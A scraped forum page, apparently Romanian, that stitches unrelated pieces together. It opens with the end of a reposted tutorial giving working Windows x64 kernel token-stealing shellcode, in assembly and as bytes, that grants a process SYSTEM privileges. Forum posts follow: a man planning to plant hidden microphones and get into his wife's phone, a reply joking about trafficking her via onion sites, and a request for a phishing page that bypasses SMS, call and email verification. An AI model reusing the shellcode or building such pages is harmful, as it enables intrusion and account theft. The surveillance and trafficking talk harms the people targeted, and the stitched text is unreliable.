rax push rbx push rcx ;; Get the current process mov rax, gs:0x188 mov rax, [rax+0xb8] ;; Loop looking for System PID mov rbx, rax mov rbx, [rbx+0x2e8] sub rbx, 0x2e8 mov rcx, [rbx+0x2e0] cmp rcx, 4 jnz -0x19 ;; Token overwrite mov rcx, [rbx + 0x348] and cl, 0xf0 mov [rax + 0x348], rcx ;; Cleanup pop rcx pop rbx pop rax pop rax pop rax pop rax pop rax pop rax xor rax, rax ret view raw win81-token-stealing-shellcode.asm hosted with ❤ by GitHub We can now simply use any assembler (NASM, YASM) - but I have a personal preference for Keystone-Engine - to generate a bytecode version of our shellcode. #define LEN 80 const char sc[LEN] = "" "\x50" // push rax "\x53" // push rbx "\x51" // push rcx "\x48\x65\xa1\x88\x01\x00\x00\x00\x00\x00\x00" // mov rax, gs:0x188 "\x48\x8b\x80\xb8\x00\x00\x00" // mov rax, [rax+0xb8] "\x48\x89\xc3" // mov rbx, rax "\x48\x8b\x9b\xe8\x02\x00\x00" // mov rbx, [rbx+0x2e8] "\x48\x81\xeb\xe8\x02\x00\x00" // sub rbx, 0x2e8 "\x48\x8b\x8b\xe0\x02\x00\x00" // mov rcx, [rbx+0x2e0] "\x48\x83\xf9\x04" // cmp rcx, 4 "\x75\x15" // jnz 0x17 "\x48\x8b\x8b\x48\x03\x00\x00" // mov rcx, [rbx + 0x348] "\x48\x89\x88\x48\x03\x00\x00" // mov [rax + 0x348], rcx "\x59" // pop rcx "\x5b" // pop rbx "\x58" // pop rax "\x58\x58\x58\x58\x58" // pop rax; pop rax; pop rax; pop rax; pop rax; (required for proper stack return) "\x48\x31\xc0" // xor rax, rax (i.e. NT_SUCCESS) "\xc3" // ret ""; Once copied into an executable location, this shellcode will grant the current process with all System privileges. The next post will actually use this newly created shellcode in a concrete vulnerability exploitation (from the Extremely Vulnerable Driver by HackSys Team). Until then, take care! Recommended readings A Guide to Kernel Exploitation - Attacking The Core Introduction To Windows Shellcode Development x64 Kernel Privilege Escalation Well-Known Security IDentifiers Sursa: https://blahcat.github.io/2017/08/14/a-primer-to-windows-x64-shellcoding/

@deauxefeforsaken Acum 8 ani te-a inselat si tu ai ramas cu ea. Acum 8 ani tu ai batut-o iar ea a ramas cu tine. Pare ca va potriviti si va meritati reciproc. Why stop now? On-topic in acest off-topic: Vrei sa afli daca iti este infidela din motive legale - ma refer la anumite clauze care ar putea exista intr-un contract prenuptial, etc. ? Sau doar ca sa stii daca ai motiv sa o iei la suturi (lucru imbecil, btw)? In cazul in care este vorba de prima varianta, as consulta un avocat inainte de orice si as lua in considerare serviciile unui detectiv particular. In cazul in care este vorba de a doua varianta, iti irosesti timpul. Per total, in cazul in care intr-adevar te inseala, varianta eleganta ar fi sa iti separi afacerile de ea si sa inchei relatia.

madstar...o sa iau mesajul tau ca si cum nu mi-ar fi adresat mie.Scrii ca n-ai altceva de facut.Ca doar e usor sa aruncam cu laturi pe internet, e la liber.(Asta fara sa stim ce se ascunde de fapt in spatele cortinei).I-am incredintat in 2008 standul lasandu-ma si de afacarea la care lucram in paralel de unul singur.Am avut grija de taica-sau 5 ani de zile, om cu 4 comotii cerebrale, paralizat, la pat.Zi de zi aproape mergeam si il ingrijeam, il plimbam/schimbam etc.Dupa decesul lui am stat langa copii, am unu micut si doi care recent au fost cu examenele pt liceu/facultate.Le-am si le ofer o situatie peste medie tuturor, nu vreau sa schitez nimic deocamdata pentru ca mi-as pierde capul si cel mai probabil copiii vor creste fara unul dintre noi, chestiune care m-ar demola pe interior pe tot restul vietii. @Sithalkes- azi am montat de dim la stand doua aparate cu ajutorul unui baiat.Pana maine dim o sa fac o verificare de ansamblu pe ultima perioada.E vorba de sume mult mai mari, doar 2 miliarde de lei vechi am scos recent din banca pentru a lua marfa din turcia.Nu zic ca se duc banii de-a intregu', ci ca nu s-a cumulat aportul normal raportat la investitii. apropo madstar, o singura data am batut-o, in 2009.prinsa iar atunci cu un teghergheu de cea mai joasa speta.Eu eram cu tirul plecat cu sare, ea imi dadea mesaje ca pe unde sunt ca sa se asigure ca am distanta buna fata de ea.Eu zambeam si cantam in timp ce jegul ala imi intra in casa si aducea atentii copiilor din, atentie, tot banii mei! cand o sa faci un 35 de ani desi nici atunci nu esti in toata deplinatatea facultatilor mintale, o sa vezi ca nu poti renunta la unele lucruri indiferent ca pe o perioada buna de timp iti vei hrani cumva cu asta ego-ul si te vei simti bine.In timp, totusi, asta te va roade si nu vei "adormi" in pace, asta sa stii de la mine.

Esti constient ca pretul de 1$/ARTICOL UNICAT este prea putin, nu? Ce copii ai prostit pana acum? +cum poti cauta pe cineva care sa te ajute la scris articole, cand scrii gresit?

Ocupa-te tu de tot ceea ce inseamna banu gros, fa tu platile mari care depasesc 1000 ron, nu mai lasa pe mana ei decat acolo 100-200 ron/saptamana, sa aiba bani de inghetata cand iese cu copii, verifica/cumpara programul , da-i la buci mai des, cumpara-i un vibrator si fa treesome cu ea si vibratoru, meri acasa cu flori, tort si vin, iar daca tot ai impresia ca te inseala, divorteaza sau mergi cu ea la o petrecere swing.

Nu e doar in capul, nu e 90%^ sigur...asa este si punct. am mai fost inselat de 3 ori pana acum, are o tentativa de divort in 2007, pot discerne ce nu e in regula cand se hazardeaza zi de zi.Problema e ca ridic o casa si sunt vadit inselat la preturile oscilante ale materialelor si sunt ferm convins ca cel cu care umbla e artizanul principal in toate treburile astea. Iphone-ul ei e cumparat la liber.Am 4 copii.Nu pot sa rup racordul acum oricat as vrea, traiesc pentru ei si vreau sa ii vad undeva ca altfel se alege praful de tot.Tocmai de asta vreau sa aflu negru pe alb, indiferent ca nu voi schita nimic momentan ci doar voi taia raul de la radicina. marko, se ascunde mai bine decat ai crede, are la activ experiente grele in asa ceva si nu e atat de usor precum pare sa ii iau doar telefonul, nu pot asculta conversatiile si sa ma uit la tot felul de chichite facute de ea in el, nu ma pricep. Cel mai probabil voi instala niste microfoane zilele urmatoare la standul unde am lasat-o sefa crezand ca fac mare randuiala. una dintre marile gafe ale vietii mele

@deauxefeforsaken Vrei sa o vinzi la arabi si sa nu mai afle nimeni de ea? Sunt onioane cu astfel de chestii. Daca tot ii place pula sa ia indesata, fara numar si la orice ora. Ti-o culeg aia de acasa, in geamantan. Mai recuperezi si ceva $$

ms m-a ajutat foarte mult

cine ma poate ajuta cu cateva scanere?

Salut, Am nevoie de o pagina de o pagina de skam-spam sa fie facuta in asa fel sa pot sarii de verificarile cerute de site ( cod prin sms, cod prin apel, cod prin e-mail etc )! Nu este de ajuns doar username si password pentru a ma putea loga! Va multumesc!